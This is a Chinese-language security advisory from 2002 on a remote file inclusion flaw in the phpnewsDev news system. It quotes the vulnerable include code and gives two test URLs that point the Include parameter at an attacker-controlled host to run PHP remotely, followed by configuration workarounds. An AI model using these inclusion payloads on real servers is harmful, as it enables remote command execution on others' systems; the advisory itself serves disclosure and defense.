phpnewsDev远程任意命令执行漏洞
发布日期:2002-10-22
更新日期:2002-10-24
受影响系统:phpnewsDev phpnewsDev
描述:
phpnewsDev是一款小型新闻发布系统。
phpnewsDev中variables.php3和lib.inc.php3脚本在包含文件时对用户输入缺少正确检查,远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意命令。
variables.php3脚本在包含french.inc时缺少正确检查:
-------Include/variables.php3-------
<?
$Mac="localhost";
$Uti="root";
$Mot="";
$Bd="phpnews";
$AnneeDeDemarrage="2000";
$MoisDeDemarrage="8";
$NbNouvelles=5;
require("$Include/french.inc");
?>
-----------------------------------
而lib.inc.php3脚本在包含config.inc.php3文件时缺少正确处理:
------------------------------------
include("$Include/config.inc.php3");
------------------------------------
攻击者可以在自己控制的服务器上提供包含恶意PHP代码的文件,并通过提交包含远程服务器上文件的请求给PhpnewsDev系统,可导致以WEB进程权限在系统上执行任意命令。
<*来源:Frog Man
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=103532704431472&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Frog Man 提供了如下测试方法:
http://[target]/variables.php3?Include=http://[attacker]
http://[target]/Include/lib.inc.php3?http://[attacker]
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 修改hp.ini文件中设置allow_url_fopen为Off,或者'register_globals' 为Off,然后重启WEB服务器。
厂商补丁:
phpnewsDev
----------
此软件的厂商未知。
浏览次数:3592
严重程度:0(网友投票)